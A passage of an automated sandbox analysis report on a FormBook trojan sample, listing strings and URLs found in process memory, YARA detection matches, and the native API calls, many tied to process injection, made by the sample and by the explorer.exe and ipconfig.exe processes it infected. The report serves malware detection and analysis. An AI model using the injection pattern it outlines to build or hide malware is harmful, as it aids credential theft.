              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkyFjaVc
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1y4nY1M
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1y4nY1M
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgshZ1y4nY1M
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0C4nY1M
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0C4nY1M
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0C4nY1M
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOiCnqEu92Fr1Mu51QrIzcXLsnzjYk.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51S7ABc9AMX6lJBP.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TLBBc9AMX6lJBP.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TjARc9AMX6lJBP.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TzBhc9AMX6lJBP.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgWxPKTM1K9nz.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1Mu52xPKTM1K9nz.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAx05IsDqlA.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5vAx05IsDqlA.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAx05IsDqlA.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAx05IsDqlA.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5WZLCzYlKw.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/robotocondensed/v25/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDpCEYatlYcyRi4A.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/robotocondensed/v25/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDtCYYatlYcyRi4A.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-32meKCMSbvtdYyQ.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-33mZKCMSbvtdYyQ.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/robotocondensed/v25/ieVj2ZhZI2eCN5jzbjEETS9weq8-19e7CAk8YvJEeg.ttf
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/robotocondensed/v25/ieVl2ZhZI2eCN5jzbjEETS9weq8-59WxDCs5cvI.ttf
              Source: explorer.exe, 00000002.00000003.3779046751.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452831874.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
              Source: explorer.exe, 00000002.00000002.4454590920.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005015223.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
              Source: explorer.exe, 00000002.00000000.1998453035.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
              Source: explorer.exe, 00000002.00000000.1998453035.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gratiasempirellc.com/comments/feed
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gratiasempirellc.com/feed
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gratiasempirellc.com/wp-json/
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gratiasempirellc.com/xmlrpc.php?rsd

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: i5NDVAFg42.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: i5NDVAFg42.exe, type: SAMPLEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: i5NDVAFg42.exe, type: SAMPLEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.4456590108.000000000E4EB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: i5NDVAFg42.exe PID: 3060, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: ipconfig.exe PID: 1772, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA360 NtCreateFile,0_2_00CFA360
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA490 NtClose,0_2_00CFA490
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA410 NtReadFile,0_2_00CFA410
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA540 NtAllocateVirtualMemory,0_2_00CFA540
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA35C NtCreateFile,0_2_00CFA35C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA40B NtReadFile,0_2_00CFA40B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFA53A NtAllocateVirtualMemory,0_2_00CFA53A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2B60 NtClose,LdrInitializeThunk,0_2_017C2B60
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_017C2BF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2AD0 NtReadFile,LdrInitializeThunk,0_2_017C2AD0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2D30 NtUnmapViewOfSection,LdrInitializeThunk,0_2_017C2D30
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2D10 NtMapViewOfSection,LdrInitializeThunk,0_2_017C2D10
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_017C2DF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2DD0 NtDelayExecution,LdrInitializeThunk,0_2_017C2DD0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_017C2C70
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2CA0 NtQueryInformationToken,LdrInitializeThunk,0_2_017C2CA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2F30 NtCreateSection,LdrInitializeThunk,0_2_017C2F30
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2FE0 NtCreateFile,LdrInitializeThunk,0_2_017C2FE0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2FB0 NtResumeThread,LdrInitializeThunk,0_2_017C2FB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2F90 NtProtectVirtualMemory,LdrInitializeThunk,0_2_017C2F90
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_017C2EA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2E80 NtReadVirtualMemory,LdrInitializeThunk,0_2_017C2E80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C4340 NtSetContextThread,0_2_017C4340
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C4650 NtSuspendThread,0_2_017C4650
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2BE0 NtQueryValueKey,0_2_017C2BE0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2BA0 NtEnumerateValueKey,0_2_017C2BA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2B80 NtQueryInformationFile,0_2_017C2B80
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2AF0 NtWriteFile,0_2_017C2AF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2AB0 NtWaitForSingleObject,0_2_017C2AB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2D00 NtSetInformationFile,0_2_017C2D00
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2DB0 NtEnumerateKey,0_2_017C2DB0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2C60 NtCreateKey,0_2_017C2C60
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2C00 NtQueryInformationProcess,0_2_017C2C00
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2CF0 NtOpenProcess,0_2_017C2CF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2CC0 NtQueryVirtualMemory,0_2_017C2CC0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2F60 NtCreateProcessEx,0_2_017C2F60
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2FA0 NtQuerySection,0_2_017C2FA0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2E30 NtWriteVirtualMemory,0_2_017C2E30
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2EE0 NtQueueApcThread,0_2_017C2EE0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C3010 NtOpenDirectoryObject,0_2_017C3010
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C3090 NtSetValueKey,0_2_017C3090
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C35C0 NtCreateMutant,0_2_017C35C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C39B0 NtGetContextThread,0_2_017C39B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C3D70 NtOpenThread,0_2_017C3D70
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C3D10 NtOpenProcessToken,0_2_017C3D10
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D4E12 NtProtectVirtualMemory,2_2_0E4D4E12
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D3232 NtCreateFile,2_2_0E4D3232
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D4E0A NtProtectVirtualMemory,2_2_0E4D4E0A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2B60 NtClose,LdrInitializeThunk,4_2_039A2B60
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2AD0 NtReadFile,LdrInitializeThunk,4_2_039A2AD0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2FE0 NtCreateFile,LdrInitializeThunk,4_2_039A2FE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2F30 NtCreateSection,LdrInitializeThunk,4_2_039A2F30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_039A2EA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2DD0 NtDelayExecution,LdrInitializeThunk,4_2_039A2DD0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_039A2DF0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_039A2D10
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_039A2CA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_039A2C70
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2C60 NtCreateKey,LdrInitializeThunk,4_2_039A2C60
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A35C0 NtCreateMutant,LdrInitializeThunk,4_2_039A35C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A4340 NtSetContextThread,4_2_039A4340
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A4650 NtSuspendThread,4_2_039A4650
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2B80 NtQueryInformationFile,4_2_039A2B80
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2BA0 NtEnumerateValueKey,4_2_039A2BA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2BF0 NtAllocateVirtualMemory,4_2_039A2BF0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2BE0 NtQueryValueKey,4_2_039A2BE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2AB0 NtWaitForSingleObject,4_2_039A2AB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2AF0 NtWriteFile,4_2_039A2AF0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A2F90 NtProtectVirtualMemory,4_2_039A2F90
